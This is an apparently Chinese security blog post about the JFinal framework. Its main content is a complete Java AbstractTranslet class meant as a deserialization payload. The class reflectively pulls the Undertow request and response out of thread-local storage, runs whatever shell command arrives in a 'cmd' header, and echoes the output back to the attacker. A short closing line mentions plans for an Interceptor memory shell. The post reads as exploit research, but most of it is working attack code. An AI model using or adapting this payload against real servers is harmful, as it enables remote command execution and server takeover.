JfinalEcho&&memoryshell

  1. 1. echo
  2. 2. memoryshell

最近看了一下jfinal这个冷门国产框架

echo

1652956455722.png

同样是这个threadlocals,其实我发现挺多web框架的回显都能从这里获得回显。

获取到的是一个io.undertow.servlet.handlers.ServletRequestContext

1652957279939.png

request和response都能拿到了

细节不多说了,就是跟jboss一样的反射获取table之后遍历即可。

但估计直接从线程获取类加载器加载这个类也可以。

完整回显:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import io.undertow.servlet.handlers.ServletRequestContext;
import io.undertow.servlet.spec.HttpServletRequestImpl;
import io.undertow.servlet.spec.HttpServletResponseImpl;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;

import java.lang.reflect.Field;
import java.lang.reflect.Method;
import java.util.Scanner;

public class Echo extends AbstractTranslet{
// ServletRequestContext
public Echo() throws Exception {
Class threadLocalMapClazz = Class.forName("java.lang.ThreadLocal$ThreadLocalMap");
Field tableField = threadLocalMapClazz.getDeclaredField("table");
tableField.setAccessible(true);

Class entryClass = Class.forName("java.lang.ThreadLocal$ThreadLocalMap$Entry");
Field entryValueField = entryClass.getDeclaredField("value");
entryValueField.setAccessible(true);

ThreadLocal tl = new ThreadLocal();

Method getMap = tl.getClass().getDeclaredMethod("getMap", Thread.class);
getMap.setAccessible(true);
Object threadLocalMap = getMap.invoke(tl, Thread.currentThread());
Object[] tables = (Object[]) tableField.get(threadLocalMap);
io.undertow.servlet.handlers.ServletRequestContext reqcontext = null;
for (int i = 0; i < tables.length; i++) {
try {
String className = entryValueField.get(tables[i]).getClass().getName();
if (className.contains("ServletRequestContext")) {
reqcontext = (ServletRequestContext) entryValueField.get(tables[i]);
break;
}
} catch (Exception e) {
continue;
}
}
Method getreq = reqcontext.getClass().getDeclaredMethod("getServletRequest");
getreq.setAccessible(true);
io.undertow.servlet.spec.HttpServletRequestImpl req = (HttpServletRequestImpl) getreq.invoke(reqcontext);
Method getHeader = req.getClass().getDeclaredMethod("getHeader", String.class);
getHeader.setAccessible(true);
String cmd = (String) getHeader.invoke(req,"cmd");
Method getrep = reqcontext.getClass().getDeclaredMethod("getServletResponse");
getrep.setAccessible(true);
io.undertow.servlet.spec.HttpServletResponseImpl resp = (HttpServletResponseImpl) getrep.invoke(reqcontext);
Method getWriter = resp.getClass().getDeclaredMethod("getWriter");
getWriter.setAccessible(true);
Object writer = getWriter.invoke(resp);
String[] commands = new String[3];
String charsetName = System.getProperty("os.name").toLowerCase().contains("window") ? "GBK" : "UTF-8";
if (System.getProperty("os.name").toUpperCase().contains("WIN")) {
commands[0] = "cmd";
commands[1] = "/c";
} else {
commands[0] = "/bin/sh";
commands[1] = "-c";
}
commands[2] = cmd;
// response2.getWriter().write(new Scanner(Runtime.getRuntime().exec(commands).getInputStream(),charsetName).useDelimiter("\\A").next());
writer.getClass().getDeclaredMethod("println", String.class).invoke(writer, new Scanner(Runtime.getRuntime().exec(commands).getInputStream(), charsetName).useDelimiter("\\A").next());
writer.getClass().getDeclaredMethod("flush").invoke(writer);
writer.getClass().getDeclaredMethod("close").invoke(writer);



}

@Override
public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {

}

@Override
public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {

}
}

1652963299344.png

memoryshell

应该是可以打Interceptor内存马的 还在看